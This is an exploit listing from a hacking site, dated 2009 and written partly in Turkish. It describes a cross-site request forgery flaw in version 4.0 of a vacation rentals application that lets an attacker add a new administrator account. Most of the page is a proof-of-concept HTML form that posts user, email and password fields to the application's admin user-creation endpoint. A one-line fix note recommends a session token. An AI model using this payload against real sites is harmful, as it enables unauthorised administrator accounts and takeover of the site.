Vacationrentals ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Vacationrentals ~ XSRF Vuln.

Madde
	Author : Bug Researchers/CWH1RLPOOL
	Date : 13.09.2009 21:08:34
	# Vacationrentals ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : vacationrentals # Version : 4.0 # vulnerable Type : XSRF # Infection : Yeni Bir Admin Eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli # author : CWH1RLPOOL ~ Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form id=http://www.site.com/[path]/admin/users_add method=post action=http://www.site.com/[path]/admin/users/add enctype=multipart/form-data> <input type=hidden name=profile_logo id=profile_logo value= /> <input class=text type=text id=user_name name=user_name value= /> <input class=text type=text id=email name=email value= /> <input class=text type=password id=password name=password /> <input class=text type=password id=retype_password name=retype_password /> <input class=text type=text id=profile_full_name name=profile_full_name value= /> <input class=text type=text id=profile_phone1 name=profile_phone1 value= /> <input class=text type=text id=profile_phone2 name=profile_phone2 value= /> <input class=text type=text id=profile_fax name=profile_fax value= /> <input class=text type=text id=profile_spoken_languages name=profile_spoken_languages value= /> <input class=text type=text id=profile_web_address name=profile_web_address value= /> <input type=file id=profile_logo_upload name=profile_logo_upload /> <input class=btn-orange type=submit value=Add user id=submit name=submit /><div class=btn-orange-end> </div> </form> < -- bug code end of -- >